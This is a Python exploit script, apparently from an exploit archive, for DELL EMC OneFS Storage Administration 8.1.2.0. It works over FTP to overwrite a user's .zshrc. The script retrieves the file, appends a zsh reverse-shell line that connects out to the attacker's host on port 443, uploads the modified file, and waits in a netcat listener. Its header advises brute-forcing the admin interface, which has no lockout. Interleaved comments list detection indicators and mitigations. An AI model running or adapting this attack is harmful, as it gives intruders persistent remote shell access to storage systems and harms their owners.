DELL EMC OneFS Storage Administration 8.1.2.0 .zshrc Overwrite



EKU-ID: 8047 CVE: OSVDB-ID:
Author: wetw0rk Published: 2018-10-11 Verified: Verified



#!/usr/bin/env python
#
# Exploit name      : isilon-onefs-brute.py
# Created date      : 9/21/18
# Submit Date       : 10/10/18
# Author            : wetw0rk
# Python version    : 2.7
# Brute Force Script: https://github.com/wetw0rk/Exploit-Development/blob/master/DELL%20EMC%20OneFS%20Storage%20Administration%20%3C%208.1.2.0/isilon-onefs-brute.py 
# Vendor Homepage   : https://www.dellemc.com/en-us/storage/isilon/onefs-operating-system.htm
# Software Link     : https://downloads.emc.com/emc-com/usa/Isilon/EMC_Isilon_OneFS_8.1.2.0_Simulator.zip
# Tested on         : DELL EMC OneFS Storage Administration 8.1.2.0
#
# Greetz: Hima (thanks for helping me think of .bashrc), Fr13ndzSec, AbeSnowman, Berserk, Neil
#
# [------------ Timeline ------------]
#   9/21/18 - Contacted Dell PSIRT
#   9/25/18 - Sent POC code
#   10/9/18 - Responded with "not considered a vulnerability"
#
# Description :
#   To exploit this vulnerability first you must gain access to the administrative
#   interface on 8080 (note no lockouts so you can bruteforce E Z). Once in enable
#   FTP like so:
#     -> Protocols -> FTP Settings -> Enable the service and transfers -> With that done, exploit!
#
#   Since you're dropped in the user home directory and not a secluded FTP directory
#   you can inject into .zshrc, however as dell stated you can access other files on
#   the system as well....
#

import os
import sys
import socket
import threading

RED = "\033[1m\033[31m[-]\033[0m"
BLUE = "\033[1m\033[94m[*]\033[0m"
GREEN = "\033[1m\033[92m[+]\033[0m"

def background_server(lhost):
    # Data-connection endpoint for the two FTP active-mode (PORT) transfers that the
    # main script issues. Which transfer it is serving is selected by the module-level
    # `check` flag (0 while the RETR runs, 1 once the main script flips it before STOR):
    #   check == 0: receive the target's original .zshrc and write a modified local copy
    #   check == 1: send that modified copy back so the STOR overwrites the original
    # The modification is one appended line that makes zsh open an outbound TCP
    # connection to lhost:443 when the rc file is next sourced; the original file is
    # renamed to .backup by the main script rather than deleted.
    #
    # lhost: dotted-quad address placed in the appended zsh line. The listening port
    #        is fixed at 50121, which is what the 195,201 octets in the PORT commands
    #        encode (195*256 + 201 = 50121).
    # Returns: never -- the accept loop below has no exit condition.
    global check

    # Local scratch copy of the rc file, created in the current working directory.
    fd = open(".zshrc", 'w')

    host = "0.0.0.0"
    port = 50121
    sock = socket.socket(
        socket.AF_INET,
        socket.SOCK_STREAM
    )
    sock.bind((host, port))
    sock.listen(5)

    print("%s listening on %s:%s" % (BLUE, host,port))
    while True:
        # One inbound data connection per FTP transfer; the peer is the FTP server.
        conn, addr = sock.accept()
        if check != 1:
            # RETR phase: a single recv() reads the original .zshrc (at most 4096 bytes
            # are captured by this one call).
            zshrc_file = conn.recv(4096)
            print("%s generating .zshrc payload" % BLUE)
            fd.write(zshrc_file)
            # msfvenom -a cmd --platform unix -p cmd/unix/reverse_zsh LHOST=192.168.245.136 LPORT=443 -f raw
            # Appended line: loads zsh's TCP module, opens a socket to lhost:443 and
            # attaches a zsh to it, backgrounded. From a monitoring standpoint the
            # indicators are a change to ~/.zshrc containing "zmodload zsh/net/tcp"
            # and egress from a zsh process on the storage node to port 443.
            fd.write("zsh -c 'zmodload zsh/net/tcp && ztcp %s 443 && zsh >&$REPLY 2>&$REPLY 0>&$REPLY' &\n" % lhost)
            # The local copy is finalised after the first transfer.
            fd.close()
        else:
            # STOR phase: stream the modified local copy back over the data connection.
            with open('.zshrc', 'r') as myfile:
                data=myfile.read()
            conn.send(data)

try:
    # Positional CLI arguments: the FTP target (rhost:rport), the address the target
    # will connect back to (lhost), and the OneFS/FTP credentials. Any failure here
    # (missing argument, non-integer port) falls through to the usage message.
    rhost = sys.argv[1]
    rport = int(sys.argv[2])
    lhost = sys.argv[3]
    username = sys.argv[4]
    password = sys.argv[5]
except:
    print("Usage: ./%s <rhost> <rport> <lhost> <username> <password>" % sys.argv[0])
    print("Example: ./%s 192.168.245.3 21 192.168.245.136 admin admin" % sys.argv[0])
    exit(0)

check = 0 # start a background server for download+uploads
# Phase flag shared with background_server(): 0 = expect the RETR'd file on the data
# connection, 1 = serve the modified file for STOR. It is flipped at module level
# below with no synchronisation between the two threads.
server_thread = threading.Thread(target=background_server, args=(lhost,))
server_thread.start()

# create a socket for the client sending the commands
# Raw FTP control session. Every server reply is read with recv(4096) and discarded,
# so the status lines printed below are not conditional on the reply codes -- e.g.
# "login was successful" is printed whether or not PASS was accepted.
print("%s connecting to %s:%s" % (BLUE, rhost, rport))
csock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
csock.connect((rhost, rport))
csock.recv(4096)    # server greeting
print("%s performing login to OneFS using %s:%s" % (BLUE, username, password))
csock.send("USER %s\r\n" % username)
csock.recv(4096)
csock.send("PASS %s\r\n" % password)
csock.recv(4096)
print("%s login was successful downloading .zshrc" % GREEN)
# Active-mode transfer: PORT h1,h2,h3,h4,p1,p2 asks the server to connect to lhost
# on port 195*256+201 = 50121, where background_server() is listening. The RETR of
# a dotfile works because, as the header describes, the FTP session lands in the
# user's home directory rather than a separate FTP root.
csock.send("PORT %s,195,201\r\n" % lhost.replace(".", ",")) # have port on 50121
csock.recv(4096)
csock.send("RETR .zshrc\r\n")
csock.recv(4096)
# The original is renamed, not removed: a leftover ~/.backup next to a freshly
# written ~/.zshrc is a host artefact an investigator can look for, together with
# FTP log entries for RNFR/RNTO/STOR against dotfiles.
csock.send("RNFR .zshrc\r\n")
csock.recv(4096)
print("%s renaming remote .zshrc to .backup" % GREEN)
csock.send("RNTO .backup\r\n")
csock.recv(4096)
check = 1
# Upload: the server connects back to 50121 again, background_server() now sends the
# modified copy, and STOR writes it as the new .zshrc.
print("%s uploading payload to target host" % GREEN)
csock.send("PORT %s,195,201\r\n" % lhost.replace(".", ",")) # have port on 50121
csock.recv(4096)
csock.send("TYPE I\r\n")    # binary mode for the upload
csock.recv(4096)
csock.send("STOR .zshrc\r\n")
print("%s exploitation complete waiting for %s to login" % (GREEN, username))
# os.system() blocks in a local listener on 443 until the modified rc file is
# sourced at the user's next zsh login. Mitigations follow from the header's own
# preconditions: keep the FTP service disabled (or confine FTP users to a dedicated
# directory), restrict access to the 8080 administrative interface and add lockout
# or rate limiting there (the header notes there is none), and alert on egress from
# storage nodes to unexpected destinations.
os.system("nc -lvp 443")
csock.close()